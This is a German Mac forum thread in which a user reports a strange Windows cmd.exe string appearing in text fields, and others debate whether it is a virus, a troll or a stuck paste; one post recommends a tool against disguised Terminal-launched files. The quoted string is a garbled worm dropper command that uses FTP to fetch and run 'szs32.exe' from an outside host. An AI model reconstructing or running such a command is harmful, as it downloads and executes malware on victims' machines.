Trojaner, Wurm entdeckt

Warum ein Windows-Schädling? - nur, weil da .exe steht. Das ist die Umkehrung dessen bei Windows, wo die Leute glauben, es sei eine pdf-Datei, nur weil sie die .exe-Endung ausgeblendet haben.

wenn das ein jpg oder ähnliches wäre- ok
aber .exe - was macht das für einen Sinn?
es sei denn der Virencoder hat den IQ eines Toastbrotes...
 
können wir das Ding net zumachen? Net noch son 400Beiträge Thread, fängt mit Getrolle an, hört mit Strickmuster-Austausch für Steve Jobs Pullis auf...

Ich bitte darum!
 
können wir das Ding net zumachen? Net noch son 400Beiträge Thread, fängt mit Getrolle an, hört mit Strickmuster-Austausch für Steve Jobs Pullis auf...

Noch besser waere es nichts mehr in diesen Thread zu posten bis nicht ein deutlicher Hinweis auf dieses Phaenomen vorliegt. Solange der nicht da ist finde ich es ziemlich muessig weiter zu spekulieren.
 
Ich tippe darauf, das Adium einen Fehler produziert hat. Dieses ganze ICQ-Gehunze ist doch mit Windows-Viren, Trojanern usw. zugemüllt bis zum geht nicht mehr.
 
wenn das ein jpg oder ähnliches wäre- ok
aber .exe - was macht das für einen Sinn?
es sei denn der Virencoder hat den IQ eines Toastbrotes...

.exe ist für den Mac nur Dateibezeichnung, das .exe selbst ist ihm doch wurscht - oder?
Es ist noch gar nicht soo lange her, da war es lediglich für Spezialisten interessant, zu erfahren, daß die Möglichkeit bestünde, Schädlinge zu programmieren, die sich wie Viren verhalten. Es hatte nicht lange gedauert, daß Computer-Viren u.s.w. Realität wurden.
Warum sollte ein Virenprogrammierer auf die "schöne" Bezeichnung .exe verzichten - vielleicht ist es ein Spaßvogel :D
 
.exe ist für den Mac nur Dateibezeichnung, das .exe selbst ist ihm doch wurscht - oder?
Klar - du kannst deine auführbare Datei auch schaedling.exe nennen - und sie würde auch auf dem Mac laufen...
(Allerdings nehm ich an, dass dann doch die Nachfrage "sie öffnen dieses Programm zum ersten Mal" oder so kommt... oder?)
 
Klar - du kannst deine auführbare Datei auch schaedling.exe nennen - und sie würde auch auf dem Mac laufen...
(Allerdings nehm ich an, dass dann doch die Nachfrage "sie öffnen dieses Programm zum ersten Mal" oder so kommt... oder?)

Du kannst das Programm auch SuperMacTool.exe nennen, wetten, daß da wer drauf klickt? :D
 
schaedling.exe würde als schaedling.exe.app angezeigt werden unter osx. aber schaedling.bat oder schaedling.com ist kein problem... mit nem neutralen icon ausgestattet... auf dem schreibtisch...
edit: nee, stimmt nich. schaedling.exe geht auch. darf halt kein app-bundle sein.
warum schreib ich das? mir passt die gehässigkeit nicht, die manchmal in bezug auf viren/würmer/böses zeugs an den tag gelegt wird, genauso wenig wie "panikmache" btw.
wie auch immer. ist wahrscheinlich alles bekannt. nur schicken mir immer noch oft genug kollegen diese dateien zu und fragen, mit welchem programm sie diese "rechnung.exe" aufkriegen. aber das ist längst OT...
 
Zuletzt bearbeitet:
schaedling.exe würde als schaedling.exe.app angezeigt werden unter osx.
Nein, natürlich nicht.
Jedenfalls nicht in der Standard-Konfiguration.
Schau doch mal in deinen Programme-Ordner.
Findest du da irgendwelche .app-Endungen?

EDIT: Sorry, hatte beim Schreiben dein Edit noch nicht gesehen ;)
 
Das einzige gefährliche Schädlingseinfalltor unter OS X ist das Terminal, diesem können Dateien mit falschem Suffix (falsche Dateiendung) untergeschoben und dann ohne Nachfrage ausgeführt werden.
http://www.heise.de/newsticker/meldung/69677
http://www.heise.de/newsticker/meldung/69854 -> unten ist eine "Demo"datei Heise.jpg.zip

Dagegen schützt zuverlässig abmst http://www.ugsoft.de/de/index.html.
abmst klinkt sich in jeden Terminalbefehl ein und verlangt eine Bestätigung.
In der abmstv4 ist eine Anleitung "Liesmich".

Hinzufügung aufgrund mehrere Nachfragen:
Die Anleitung „Liesmich“ in abmstv4 ist bzgl. Änderung englich in deutsch etwas unübersichtlich, deshalb hier meine Anleitung:

abmstv4.dmg doppelklicken, der Installationsassistent startet, nach dem Beenden ist abmstv4 installiert und einsatzbereit.
Zum Testen die "Demo"Datei Heise.jpg.zip saugen, zum Entpacken doppelklicken.
Jetzt Heise.jpg doppelklicken, das Terminal wird gestartet, im Fenster ist die abmstv4- Warnung/Abfrage dem eigentlichen Befehl vorgeschaltet.
abmstv4 Warnung/Abfrage in englisch

Die Warnung/Abfrage ist in englisch, wen das stört und in deutsch umstellen möchte, der klickt nun oben in Terminal, Einstellungen und ändert in /usr/local/bin/abmst-en /usr/bin/login das en in de, sieht dann so aus: /usr/local/bin/abmst-de /usr/bin/login

Das Einstellungen-Fenster schließen, das Terminal beenden.
Jetzt wieder mit Heise.jpg testen, die Warnung/Abfrage sollte jetzt in deutsch sein.
(Bisher hat das Umstellen von en in de immer auf Anhieb geklappt, bei einem Mac mußte ich es aber mehrmals ändern bis es dauerhaft übernommen wurde.)
abmstv4 in deutsch ändern
 
Zuletzt bearbeitet:
  • Gefällt mir
Reaktionen: Swiri
Mein System fängt in unregelmäigen Abständen an folgenden Text zu erstellen:
%szstemroot%#szstem32#cmd.exe


cmd -c echo open http://www.powersofthosting.com 21 :: ik /echo user jonf10 powersoft :: ik /echo binarz :: ik /echo get szs32.exe :: ik /echo bze :: ik /ftp ßn ßv ßsÖik /del ik /szs32.exe /exit

obiger Text fiel einem verhunztem Layout zum Opfer, qwertz vs. qwerty.

Falls es jemandem noch nicht auffiel,
und ganz wertfrei gesehen.

myob.
 
Ich weiß das der Mac keine .exe ausführen kann. Aber trotzdem nervt es einfach nur. Er schreibt es quasie überall wo gerade platz ist. Wenn man in jedes Textfeld das gerade frei ist. Wenn man ein Telegramm geöffnet hat in die Eingabezeile. Wenn man die Macintosh HD angewählt hat, in den Bezeichner. Und wenn gerade nichts ausgewählt ist, gibt er halt den Typischen Wahnton aus, wenn man versucht etwas zu tippen wo nichts ist. Wenn man gerade im Terminal ist, würde er halt auch dort versuchen es auszuführen. Würde er es jetzt versuchen wo ich gerade diese Antwort tippe, würde es in diesem Feld stehen.

sehr sehr komisch ist, wenn er es "überall" hinschreibt, warum dann nie in einen deiner posts.... :hamma:
sry aber imo nur ein troll:dance2:
 
Zuletzt bearbeitet:
dieser Befehl versucht doch das cmd.exe aufzumachen, oder? Was dem Terminal entspricht. Also, wenn das wirklich auftritt muss man sicher also keine sorgen machen. Von wegen macht system kaputt.
 
Also, so wie ich das verstanden habe, wir der Text einfach nur überall, wo sich Text einfügen lässt, eingefügt...

Hört sich für mich eher nach einem amok gelaufenem Copy&Paste an, bzw, dem Einfügen aus der Zwischenablage.

Verklemmte Apfel+V Taste vielleicht? Das das Tastaturlayout geändert wurde seh ich mal als hinweis drauf (Auf Tastatur gehauen, mit dem Kopf drauf eingeschlafen).

bleibt freillich noch die Frage, woher der Text ursprünglich herkommt...

Mal ein wenig drauf achten, was man gerade gemacht hat, sollte es wieder auftreten, bzw, bewusst reprodozierbar sein...

Meine bescheidene Meinung...
 
Was lernen wir aus diesem Thread? Wenn ich wirklich mal einen dieser seltenen Viren haben sollte, muss ich mir eine Videokamera kaufen. Ohje, hoffentlich bleibe ich verschont.
 
@birddog
du musst aber zugeben, dass es schon recht eigenartig ist
zudem bisher nur ein einziger Virus bekannt ist dessen Verbreitung und Gefährlichkeit als low eingestuft ist....und das Ding da oben ist definitiv ein Windows Virus...
 
Hallo Ostfriese,

ich habe keine Angst vor Viren, wollte aber den Dialog in diesem Fred kritisieren. Mein Motto ist "im Zweifelsfall für den Fredersteller" bis seine Schuld einwandfrei erwiesen ist. Man muss ihn nicht als Troll bezeichnen, auch wenn man vielleicht so eine Vermutung hat.
 
Zurück
Oben Unten